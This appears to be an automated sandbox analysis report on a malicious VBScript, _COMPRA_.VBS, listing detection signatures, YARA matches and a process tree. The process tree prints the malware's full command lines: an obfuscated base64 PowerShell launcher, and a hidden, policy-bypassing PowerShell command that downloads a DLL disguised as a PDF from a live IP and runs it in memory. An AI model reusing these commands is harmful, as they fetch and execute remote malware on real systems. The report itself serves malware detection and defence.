Edit tour
Windows
Analysis Report
_COMPRA_.VBS
Overview
General Information
Detection
Score: | 88 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Generic Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges
Classification
- System is w10x64
- wscript.exe (PID: 6256 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\D esktop\_CO MPRA_.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C) - powershell.exe (PID: 6388 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ iUqm = 'Ww BCAHkAdABl AFsAXQBdAC AAJABEAEwA TAAgAD0AIA BbAFMAeQBz AHQAZQBtAC 4AQwBvAG4A dgBlAHIAdA BdADoAOgBG AHIAbwBtAE IAYQBzAG?? ?ANgA0AFMA dAByAGkAbg BnACgAKABO AG???AdwAt AE8AYgBqAG ???AYwB0AC AATgBlAHQA LgBXAG???A YgBDAGwAaQ BlAG4AdAAp AC4ARABvAH cAbgBsAG8A YQBkAFMAdA ByAGkAbgBn ACgAJwBoAH QAdABwADoA LwAvADIAMA AuADEAMAA2 AC4AMgAzAD IALgA0AC8A ZABsAGwALw BuAG???Adw AuAHAAZABm ACcAKQApAD sAWwBTAHkA cwB0AG???A bQAuAEEAcA BwAEQAbwBt AGEAaQBuAF 0AOgA6AEMA dQByAHIAZQ BuAHQARABv AG0AYQBpAG 4ALgBMAG8A YQBkACgAJA BEAEwATAAp AC4ARwBlAH QAVAB5AHAA ZQAoACcAZA BkAHMAYwBm AEkAdgBxAG cAVwAuAEgA bwBOAFkAbA BEAFIATwBM AFAAJwApAC 4ARwBlAHQA TQBlAHQAaA BvAGQAKAAn AFIAdQBuAC cAKQAuAEkA bgB2AG8Aaw BlACgAJABu AH???AbABs ACwAIABbAG 8AYgBqAG?? ?AYwB0AFsA XQBdACAAKA AnAHQAeAB0 AC4AaABnAH ???AdQByAH QAdAAvADEA NwAxAC4AOA AxAC4AMwAz ADEALgA1AD kAMQAvAC8A OgBwAHQAdA BoACcAKQAp AA==';$OWj uxD = [Sys tem.Text.E ncoding]:: Unicode.Ge tString( [ System.Con vert]::Fro mBase64Str ing( $iUqm .replace(' ???','U') ) );powers hell.exe - windowstyl e hidden - ExecutionP olicy Byps s -NoProfi le -Comman d $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913) - conhost.exe (PID: 6396 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 6520 cmdline:
C:\Windows \System32\ WindowsPow erShell\v1 .0\powersh ell.exe" - windowstyl e hidden - ExecutionP olicy Byps s -NoProfi le -Comman d "[Byte[] ] $DLL = [ System.Con vert]::Fro mBase64Str ing((New-O bject Net. WebClient) .DownloadS tring('htt p://20.106 .232.4/dll /new.pdf') );[System. AppDomain] ::CurrentD omain.Load ($DLL).Get Type('ddsc fIvqgW.HoN YlDROLP'). GetMethod( 'Run').Inv oke($null, [object[] ] ('txt.hg uurtt/171. 81.331.591 //:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913) - powershell.exe (PID: 6728 cmdline:
powershell Copy-Item -Path C:\ Windows\Te mp\*.vbs - Destinatio n C:\Progr amData\Don e.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth |
| |
SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth |
| |
SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth |
| |
PowerShell_Susp_Parameter_Combo | Detects PowerShell invocation with suspicious parameters | Florian Roth |
| |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_Reversed_Base64_Encoded_EXE | Detects an base64 encoded executable with reversed characters | Florian Roth |
| |
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security | ||
MALWARE_Win_DLAgent09 | Detects known downloader agent | ditekSHen |
|
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Virustotal: | Perma Link |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Binary string: |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Networking |
---|
Source: | File source: |
Source: | Bad PDF prefix: |